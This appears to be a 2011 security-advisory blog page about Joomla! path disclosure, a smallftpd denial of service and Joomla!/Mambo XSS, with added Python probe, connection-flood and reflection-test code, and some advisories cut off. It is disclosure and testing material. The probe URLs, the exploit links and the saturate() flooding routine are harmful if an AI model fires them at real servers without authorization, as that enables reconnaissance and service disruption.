Posts

Showing posts from June, 2011

Full Path Disclosure | Joomla! 1.6.3 and lower (parameters: limitstart, limit , component: com_content)

Each of the URLs below hands com_content a negative limit or limitstart value; the resulting error output discloses the absolute filesystem path of the Joomla! installation. Both URL styles are covered: SEO-rewritten paths and plain index.php query strings.

SEO Mode:
===========
http://localhost/joomla163/index.php/using-joomla/extensions/components/content-component/archived-articles?limitstart=-1
http://localhost/joomla163/index.php/using-joomla/extensions/components/content-component/archived-articles?limit=-1&limitstart=1

SEO Mode Off
============
http://localhost/joomla163_noseo/index.php?option=com_content&view=archive&Itemid=256&month=3&year=1&limit=-5&view=archive&option=com_content&limitstart=1
http://localhost/joomla163_noseo/index.php?option=com_content&view=archive&Itemid=256&month=3&year=1&limit=5&view=archive&option=com_content&limitstart=-1

---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd
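As an added example (not part of the advisory and not Joomla! code), the following Python builds the negative-value probes for a target URL in either SEO or plain mode and scans a fetched response body for PHP error messages that carry an absolute path. The regex is written for PHP's generic error message shape, not for any specific Joomla! output; SAMPLE_BODY and the paths in it are constructed for the example, and fetching the probe URLs is left to the caller.

```python
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# PHP error text in both plain (display_errors) and html_errors form, e.g.
#   Warning: ... in /var/www/site/file.php on line 42
#   <b>Warning</b>:  ... in <b>C:\xampp\htdocs\site\file.php</b> on line <b>42</b>
PHP_ERROR_RE = re.compile(
    r"(?:Warning|Notice|Deprecated|Fatal error|Parse error)(?:</b>)?:\s*.*?"
    r"\bin\s+(?:<b>)?(?P<path>[A-Za-z]:\\[^<\n]+?|/[^<\n]+?)(?:</b>)?"
    r"\s+on line\s+(?:<b>)?(?P<line>\d+)",
    re.DOTALL,
)


def find_disclosed_paths(body: str) -> list[tuple[str, int]]:
    """Return (absolute path, line number) for every PHP error message found in
    an HTTP response body. Any hit means the server leaked its install directory."""
    return [(m.group("path"), int(m.group("line"))) for m in PHP_ERROR_RE.finditer(body)]


def build_probes(url: str, params=("limit", "limitstart"), value: str = "-1") -> list[str]:
    """Derive one probe URL per pagination parameter, forcing it to a negative
    value. Works for plain index.php?option=... URLs and for SEO-rewritten paths
    with no query string (the parameter is simply appended)."""
    parts = urlsplit(url)
    base = dict(parse_qsl(parts.query, keep_blank_values=True))  # duplicate keys collapse to the last value
    probes = []
    for name in params:
        q = dict(base)
        q[name] = value
        probes.append(urlunsplit(parts._replace(query=urlencode(q))))
    return probes


# Constructed response body (not captured from a real Joomla! install) showing
# both PHP error formats; the file paths are invented for the example.
SAMPLE_BODY = (
    "<html><body>\n"
    "<br />\n<b>Warning</b>:  Invalid argument supplied for foreach() in "
    "<b>/var/www/joomla163/components/com_content/example.php</b> on line <b>42</b><br />\n"
    "Fatal error: Call to a member function on a non-object in "
    "C:\\xampp\\htdocs\\joomla163_noseo\\example.php on line 7\n"
    "</body></html>"
)

if __name__ == "__main__":
    seo_url = "http://localhost/joomla163/index.php/using-joomla/extensions/components/content-component/archived-articles"
    for probe in build_probes(seo_url):
        print("probe:", probe)
    for path, line in find_disclosed_paths(SAMPLE_BODY):
        print(f"disclosed: {path} (line {line})")
```

In practice you request each probe URL, pass the body to find_disclosed_paths, and treat any returned path as a confirmed disclosure; the same scan works for the non-SEO URLs above, where build_probes rewrites the existing limit and limitstart values in place.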

smallftpd <= 1.0.3-fix | Connection Saturation Remote Denial of Service Vulnerability

1. OVERVIEW
The smallftpd FTP server is vulnerable to denial of service when handling multiple connection requests, regardless of its maximum connection setting. A successful attack makes smallftpd crash or reject new FTP login requests.

2. BACKGROUND
smallftpd is a small and simple multi-threaded FTP server for Windows.

3. VERSIONS AFFECTED
1.0.3-fix and earlier

4. PROOF-OF-CONCEPT/EXPLOIT
http://dev.metasploit.com/redmine/attachments/1330/smallftpd103fix_saturation.rb
http://www.exploit-db.com/download/17455

5. SOLUTION
The vendor has discontinued this product, so no patch or upgrade mitigates this problem. Use an alternative FTP server package in its place.

6. VENDOR
Arnaud Mary

7. CREDIT
This vulnerability was discovered by Myo Soe, http://yehg.net, YGN Ethical Hacker Group, Myanmar.

8. REFERENCES
Original Advisor
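An added example, not smallftpd's code and not the referenced Metasploit module: a small Python listener that enforces its maximum concurrent-connection count at accept time, together with a saturation check that opens more connections than the limit and counts how many were serviced versus refused. The banner text, the 421 refusal, the limits and the port selection are choices made for this example; a server with the flaw described above would report every connection as accepted until it crashed or stopped answering.

```python
import socket
import threading

BANNER = b"220 demo FTP service ready\r\n"
REFUSAL = b"421 Too many connections, try again later\r\n"


class LimitedServer:
    """Minimal threaded TCP listener that never services more than max_clients
    sessions at once. A connection arriving while every slot is taken gets a
    421 and is closed immediately, so a flood cannot exhaust threads or starve
    the clients already logged in."""

    def __init__(self, max_clients: int, host: str = "127.0.0.1", port: int = 0):
        self.max_clients = max_clients
        self.slots = threading.BoundedSemaphore(max_clients)
        self.rejected = 0
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))          # port 0: let the OS pick a free port
        self.sock.listen(64)
        self.sock.settimeout(0.2)             # lets the accept loop notice stop()
        self.host, self.port = self.sock.getsockname()[:2]
        self._stop = threading.Event()
        self._thread = threading.Thread(target=self._accept_loop, daemon=True)

    def start(self) -> "LimitedServer":
        self._thread.start()
        return self

    def stop(self) -> None:
        self._stop.set()
        self._thread.join(timeout=2)
        self.sock.close()

    def _accept_loop(self) -> None:
        while not self._stop.is_set():
            try:
                conn, _ = self.sock.accept()
            except socket.timeout:
                continue
            except OSError:
                break
            # Non-blocking acquire: the limit is enforced before any per-session
            # resource (thread, login state) is allocated for the new connection.
            if not self.slots.acquire(blocking=False):
                self.rejected += 1
                try:
                    conn.sendall(REFUSAL)
                finally:
                    conn.close()
                continue
            threading.Thread(target=self._serve, args=(conn,), daemon=True).start()

    def _serve(self, conn: socket.socket) -> None:
        try:
            conn.settimeout(30)               # an idle session cannot hold a slot forever
            conn.sendall(BANNER)
            while conn.recv(1024):            # hold the slot until the client hangs up
                pass
        except OSError:
            pass
        finally:
            conn.close()
            self.slots.release()


def saturate(host: str, port: int, attempts: int, timeout: float = 2.0):
    """Open `attempts` connections and keep the accepted ones open so they keep
    occupying slots. Returns (accepted, rejected, held_sockets)."""
    held, accepted, rejected = [], 0, 0
    for _ in range(attempts):
        s = socket.create_connection((host, port), timeout=timeout)
        if s.recv(128).startswith(b"220"):
            accepted += 1
            held.append(s)
        else:
            rejected += 1
            s.close()
    return accepted, rejected, held


def check_limit(max_clients: int = 3, attempts: int = 5) -> tuple[int, int]:
    """Start a limited server, throw `attempts` connections at it and report how
    many were serviced versus refused. A correctly enforced limit yields
    (max_clients, attempts - max_clients)."""
    server = LimitedServer(max_clients).start()
    try:
        accepted, rejected, held = saturate(server.host, server.port, attempts)
        for s in held:
            s.close()
        return accepted, rejected
    finally:
        server.stop()


if __name__ == "__main__":
    print("accepted, rejected =", check_limit())
```

The same saturate() routine, pointed at a real FTP service with attempts set above its configured maximum, tells you whether the limit is enforced at the listener (surplus connections get a 4xx and are closed) or only nominally (every connection is accepted and the daemon degrades).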

Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities

1. OVERVIEW
Joomla! 1.6.3 and lower are vulnerable to multiple Cross Site Scripting issues.

2. BACKGROUND
Joomla! is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets. It comprises a model–view–controller (MVC) web application framework that can also be used independently. Joomla! is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization.

3. VULNERABILITY DESCRIPTION
Several parameters (QueryString, option, searchword) in Joomla! core components (com_content, com_contact, com_newsfeeds, com_search) are not properly sanitized when submitted to the /index.php URL, which allows an attacker to conduct Cross Site Script

Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities

1. OVERVIEW
Mambo CMS 4.6.5 and lower versions are vulnerable to Cross Site Scripting.

2. BACKGROUND
Mambo is a full-featured, award-winning content management system that can be used for everything from simple websites to complex corporate applications. It is used all over the world to power government portals, corporate intranets and extranets, ecommerce sites, nonprofit outreach, schools, churches, and community sites. Mambo's "power in simplicity" also makes it the CMS of choice for many small businesses and personal sites.

3. VULNERABILITY DESCRIPTION
Multiple parameters (task, menu, menutype, zorder, search, client, section) are not properly sanitized, which allows an attacker to conduct a Cross Site Scripting attack. An attacker may create a specially crafted URL that executes arbitrary script code in a victim's browser.

4. VERSIONS AFFECTED
Tested on Mambo CMS 4.6.5 (current as
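Both the Joomla! advisory above and this Mambo advisory come down to the same test: set a parameter to a marker containing the characters an HTML encoder must neutralise, and see whether the page echoes them back raw, entity-encoded, partially filtered, or not at all. The following Python is an added example (not code from either advisory, from Joomla! or from Mambo) that builds such a marker per parameter and classifies a response body; SAMPLE_RESPONSES are constructed fragments, not captured output, and fetching the pages is left to the caller.

```python
DANGEROUS = "\"'<>"          # the characters an HTML encoder must neutralise, in a fixed order
ENTITIES = {                 # accepted encodings for each, as emitted by htmlspecialchars / html.escape
    '"': ("&quot;", "&#34;", "&#x22;"),
    "'": ("&#039;", "&#39;", "&#x27;", "&apos;"),
    "<": ("&lt;",),
    ">": ("&gt;",),
}


def make_marker(param: str) -> str:
    """Unique, greppable value to inject into one parameter: a prefix naming
    the parameter followed by the dangerous characters."""
    return "yg" + param + DANGEROUS


def classify_reflection(body: str, marker: str) -> tuple[str, str]:
    """Locate the marker's prefix in a response body and walk the four dangerous
    characters that should follow it, noting for each whether it came back raw,
    as an entity, or not at all. Returns (verdict, surviving_chars):
      raw      - all four reflected unchanged (exploitable)
      partial  - some reflected unchanged (often still exploitable)
      encoded  - all four entity-encoded (safe in text and attribute context)
      filtered - a character was stripped or rewritten (verify by hand)
      absent   - the marker was not reflected at all
    """
    prefix = marker[: -len(DANGEROUS)]
    pos = body.find(prefix)
    if pos < 0:
        return "absent", ""
    pos += len(prefix)
    surviving, encoded = "", 0
    for ch in DANGEROUS:
        if body.startswith(ch, pos):
            surviving += ch
            pos += 1
            continue
        ent = next((e for e in ENTITIES[ch] if body.startswith(e, pos)), None)
        if ent is None:
            break                       # stripped or rewritten: stop walking
        encoded += 1
        pos += len(ent)
    if surviving == DANGEROUS:
        return "raw", surviving
    if surviving:
        return "partial", surviving
    return ("encoded" if encoded == len(DANGEROUS) else "filtered"), ""


def audit(responses: dict[str, str]) -> dict[str, tuple[str, str]]:
    """Classify one response body per probed parameter."""
    return {p: classify_reflection(body, make_marker(p)) for p, body in responses.items()}


# Constructed response fragments (not captured from Joomla! or Mambo): each is
# what a page might return after the named parameter was set to make_marker(param).
SAMPLE_RESPONSES = {
    "searchword": '<input name="searchword" value="ygsearchword"\'<>">',        # echoed raw
    "option":     '<input name="option" value="ygoption&quot;&#039;&lt;&gt;">',  # htmlspecialchars(ENT_QUOTES)
    "task":       "<p>Results for ygtask\"' on this site</p>",                  # tags stripped, quotes kept
    "section":    "<p>Section ygsection was not found</p>",                     # everything stripped
    "menutype":   "<p>No results</p>",                                          # not reflected
}

if __name__ == "__main__":
    for param, (verdict, survivors) in audit(SAMPLE_RESPONSES).items():
        print(f"{param:<11} {verdict:<9} {survivors!r}")
```

The "partial" verdict is the one to read carefully: a value reflected inside a quoted attribute is exploitable as soon as the matching quote survives, even with angle brackets stripped, so only "encoded" and "absent" can be treated as safe without further inspection.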